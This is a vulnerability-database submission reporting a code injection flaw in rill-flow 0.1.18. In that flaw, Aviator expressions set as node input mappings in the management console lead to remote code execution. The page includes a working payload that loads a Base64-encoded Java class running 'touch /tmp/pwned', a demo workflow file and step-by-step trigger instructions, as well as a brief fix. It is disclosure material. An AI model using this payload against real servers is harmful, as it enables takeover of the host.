| Título | weibocom rill-flow rill-flow-0.1.18 Code Injection |
|---|
| Descripción | refer https://github.com/weibocom/rill-flow/issues/102
In the Rillflow management console, attackers can create a process list and set input mappings for nodes to process Aviator expressions, which can lead to Remote Code Execution (RCE). This allows them to escalate from a web user to gain machine privileges.
JDK17's rillfow payload
···
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));
···
Impact
Rillflow *
### Proof of Concept1
1.Create a process list, click Create
2. import demo file
···
version: 1.0.0
workspace: rillFlowSimple
dagName: greet
alias: release
type: flow
inputSchema: >-
[{"required":true,"name":"Bob","type":"String"},{"required":true,"name":"Alice","type":"String"}]
tasks:
- category: function
name: Bob
resourceName: http://sample-executor:8000/greet.json?user=Bob
pattern: task_sync
tolerance: false
next: Alice
inputMappings:
- source: "$.context.Bob"
target: "$.input.Bob"
- category: function
name: Alice
resourceName: http://sample-executor:8000/greet.json?user=Alice
pattern: task_sync
tolerance: false
inputMappings:
- source: "$.context.Alice"
target: "$.input.Alice"
···
3. Click Bob Input payload
···
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));
···
Then victim will execute touch /tmp/pwned.
4. Click save then set alias name
5. Click next Step,click Submit
6.Click Test Run,Input some args,execute command
### How to Fix It
When using Aviator, add relevant configurations to it to prohibit the loading of external classes.
https://www.yuque.com/boyan-avfmj/aviatorscript/yr1oau
Simply set the classes in the whitelist to empty.
|
|---|
| Fuente | ⚠️ https://github.com/weibocom/rill-flow/issues/102 |
|---|
| Usuario | startr4ck (UID 76213) |
|---|
| Sumisión | 2025-05-12 05:17 (hace 12 meses) |
|---|
| Moderación | 2025-05-16 21:11 (5 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 309408 [weibocom rill-flow 0.1.18 Management Console escalada de privilegios] |
|---|
| Puntos | 20 |
|---|